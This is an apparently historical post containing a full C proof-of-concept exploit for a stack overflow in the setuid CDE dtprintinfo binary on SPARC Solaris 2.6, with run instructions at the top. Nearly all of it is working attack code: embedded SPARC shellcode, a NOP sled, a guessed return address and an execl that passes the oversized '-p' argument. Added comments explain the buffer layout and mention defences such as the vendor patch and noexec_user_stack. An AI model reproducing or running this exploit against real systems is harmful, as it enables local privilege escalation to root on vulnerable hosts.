Sorry, I forgot to to write the following things... Before execution of dtprintinfo exploit, please make a dummy lpstat command. for example, % cat > lpstat echo "system for lpprn: server.com" ^D % chmod 755 lpstat % setenv PATH .:$PATH % gcc ex_dtprintinfo.c % a.out Following exploit program is for Sparc Solaris. I tested on Solaris2.6.
/* ========================================================================
   ex_dtprintinfo.c  Overflow Exploits( for Sparc Edition)
   The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
   Written by UNYUN (unewn4that_private)
   ========================================================================= */

/*
 * Stack-overflow proof of concept against the CDE dtprintinfo binary on
 * SPARC Solaris (the author reports testing it on Solaris 2.6).  The
 * over-long string is handed to dtprintinfo as its "-p" printer-name
 * argument in the execl() at the bottom of main().  Every constant below is
 * tuned to that one build and environment.
 *
 * Defensive notes: the overflow lives in the vendor's dtprintinfo, so the
 * fix is the vendor patch; because the payload executes from the stack,
 * enabling noexec_user_stack in /etc/system on Solaris also stops it.  The
 * instructions above about a dummy `lpstat` on PATH imply that dtprintinfo
 * runs lpstat before the vulnerable code path is reached -- not verified
 * here.
 *
 * No headers are included: putenv, strlen, printf and execl are all
 * implicitly declared, which C89 tolerated and current compilers reject.
 */
#define ADJUST 0             /* leading padding bytes; none are used */
#define OFFSET 1144          /* subtracted from this process's %sp to guess the target frame */
#define STARTADR 724         /* byte offset of the payload inside x[] */
#define BUFSIZE 900          /* length of the argument string given to dtprintinfo */
#define NOP 0xa61cc013       /* SPARC sled filler; decodes to xor %l3,%l3,%l3 */

static char x[1000];         /* the argument string under construction; 1000 > BUFSIZE, so x[BUFSIZE] is in bounds */
unsigned long ret_adr;       /* guessed return address written repeatedly into x[] */
int i;                       /* shared loop index (int, compared against size_t below) */

/* 80 bytes of SPARC machine code.  It contains no 0x00 byte, which is what
 * makes the strlen() in main() usable for its length. */
char exploit_code[] = "\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

/*
 * Return this process's stack pointer.  There is no C return statement: the
 * inline asm copies %sp into %i0, which under the SPARC register-window
 * convention is what the caller receives in %o0.  This only works if the
 * compiler gives the function its own register window, so it is
 * compiler- and platform-specific.
 */
unsigned long get_sp(void)
{
    __asm__("mov %sp,%i0 \n");
}

/*
 * Assemble the overflow string in x[] and exec dtprintinfo with it.
 *
 * Final layout of x[] (ADJUST is 0): bytes [0,600) hold the guessed return
 * address repeated, bytes [600,724) keep the NOP sled, the payload occupies
 * [724,804), the sled continues to 900, and x[900] is the terminating NUL.
 * All multi-byte values are stored big-endian, one byte at a time, as SPARC
 * expects.  Writing the same address over the first 600 bytes is how the
 * exploit covers an imprecise guess of where the saved return address sits.
 */
main()
{
    putenv("LANG=");                          /* neutral locale; presumably keeps the target's stack layout predictable */
    for (i = 0; i < ADJUST; i++)
        x[i]=0x11;                            /* padding; never executes because ADJUST is 0 */
    /* Fill the buffer with the sled instruction, big-endian.  900 is BUFSIZE written as a literal;
     * the last store is x[899]. */
    for (i = ADJUST; i < 900; i+=4){
        x[i+3]=NOP & 0xff;
        x[i+2]=(NOP >> 8 ) &0xff;
        x[i+1]=(NOP >> 16 ) &0xff;
        x[i+0]=(NOP >> 24 ) &0xff;
    }
    /* Copy the payload over the sled starting at STARTADR (signed i vs. size_t strlen). */
    for (i=0;i<strlen(exploit_code);i++)
        x[STARTADR+i+ADJUST]=exploit_code[i];
    ret_adr=get_sp()-OFFSET;                  /* assume the target's frame is OFFSET bytes below our own %sp */
    printf("jumping address : %lx\n",ret_adr);
    /* x is passed as a C string, so a 0x00 low byte would truncate it; step back 16 bytes, which
     * still lands in the sled.  Only the low byte is checked -- a zero in a higher byte would
     * truncate just the same and is not handled. */
    if ((ret_adr & 0xff) ==0 ){
        ret_adr -=16;
        printf("New jumping address : %lx\n",ret_adr);
    }
    /* Overwrite the first 600 bytes with the return address, big-endian; last store is x[599]. */
    for (i = ADJUST; i < 600 ; i+=4){
        x[i+3]=ret_adr & 0xff;
        x[i+2]=(ret_adr >> 8 ) &0xff;
        x[i+1]=(ret_adr >> 16 ) &0xff;
        x[i+0]=(ret_adr >> 24 ) &0xff;
    }
    x[BUFSIZE]=0;                             /* NUL-terminate at index 900 */
    /* Does not return on success; a failed execl is not reported (return value unchecked).
     * A 900-byte "-p" argument to a setuid CDE binary is also the thing to look for in
     * process-accounting or audit records. */
    execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0);
}
The Shadow Penguin Security (http://base.oc.to/skyscraper/byte/551) UNYUN (unewn4that_private)